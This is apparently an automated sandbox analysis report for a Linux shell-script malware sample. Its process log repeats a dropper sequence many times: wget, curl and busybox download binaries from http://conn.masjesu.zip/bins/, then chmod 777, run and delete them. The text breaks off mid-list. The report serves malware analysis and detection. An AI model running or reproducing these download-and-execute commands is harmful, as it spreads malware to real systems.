Malware Analysis Report

2025-04-03 18:57

Sample ID 241121-bc2yra1rel
Target 0766721821c3e4418c33ba73125add0a.bin
SHA256 2e2b3ce541f65d397202c55134a2322f97b77030ad26f52489c8a65e1fffa017
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

2e2b3ce541f65d397202c55134a2322f97b77030ad26f52489c8a65e1fffa017

Threat Level: Shows suspicious behavior

The file 0766721821c3e4418c33ba73125add0a.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 01:00

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 01:00

Reported

2024-11-21 01:03

Platform

debian9-mipsel-20240226-en

Max time kernel

149s

Max time network

153s

Command Line

[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP N/A
N/A /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m N/A
N/A /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX N/A
N/A /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL N/A
N/A /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh N/A
N/A /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y N/A
N/A /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG N/A
N/A /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d N/A
N/A /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s N/A
N/A /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t N/A
N/A /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 N/A
N/A /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv N/A
N/A /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx N/A
N/A /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM N/A
N/A /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP N/A
N/A /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m N/A
N/A /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX N/A
N/A /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL N/A
N/A /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh N/A
N/A /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y N/A
N/A /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG N/A
N/A /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d N/A
N/A /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s N/A
N/A /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t N/A
N/A /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 N/A
N/A /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv N/A
N/A /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx N/A
N/A /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m /usr/bin/curl N/A
File opened for modification /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL /usr/bin/curl N/A
File opened for modification /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG /usr/bin/curl N/A
File opened for modification /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 /usr/bin/curl N/A
File opened for modification /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL /usr/bin/curl N/A
File opened for modification /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t /usr/bin/curl N/A
File opened for modification /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh /usr/bin/curl N/A
File opened for modification /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX /usr/bin/curl N/A
File opened for modification /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s /usr/bin/curl N/A
File opened for modification /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y /usr/bin/curl N/A
File opened for modification /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s /usr/bin/curl N/A
File opened for modification /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 /usr/bin/curl N/A
File opened for modification /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx /usr/bin/curl N/A
File opened for modification /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM /usr/bin/curl N/A
File opened for modification /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y /usr/bin/curl N/A
File opened for modification /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv /usr/bin/curl N/A
File opened for modification /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv /usr/bin/curl N/A
File opened for modification /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh /usr/bin/curl N/A
File opened for modification /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m /usr/bin/curl N/A
File opened for modification /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d /usr/bin/curl N/A
File opened for modification /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP /usr/bin/curl N/A
File opened for modification /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d /usr/bin/curl N/A
File opened for modification /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM /usr/bin/curl N/A
File opened for modification /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP /usr/bin/curl N/A
File opened for modification /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX /usr/bin/curl N/A
File opened for modification /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG /usr/bin/curl N/A
File opened for modification /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t /usr/bin/curl N/A
File opened for modification /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx /usr/bin/curl N/A

Processes

/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh

[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/chmod

[chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP

[./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/rm

[rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/chmod

[chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m

[./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/rm

[rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/chmod

[chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX

[./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/rm

[rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/chmod

[chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL

[./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/rm

[rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/chmod

[chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh

[./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/rm

[rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/chmod

[chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y

[./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/rm

[rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/chmod

[chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG

[./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/rm

[rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/chmod

[chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d

[./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/bin/rm

[rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/chmod

[chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s

[./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/bin/rm

[rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/chmod

[chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t

[./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/bin/rm

[rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/chmod

[chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8

[./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/bin/rm

[rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/chmod

[chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv

[./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/bin/rm

[rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/chmod

[chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx

[./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/bin/rm

[rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/chmod

[chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM

[./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/bin/rm

[rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/chmod

[chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP

[./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/bin/rm

[rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/chmod

[chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m

[./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/bin/rm

[rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/chmod

[chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX

[./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/bin/rm

[rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/chmod

[chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL

[./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/bin/rm

[rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/chmod

[chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh

[./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/bin/rm

[rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/chmod

[chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y

[./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/bin/rm

[rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]

/bin/chmod

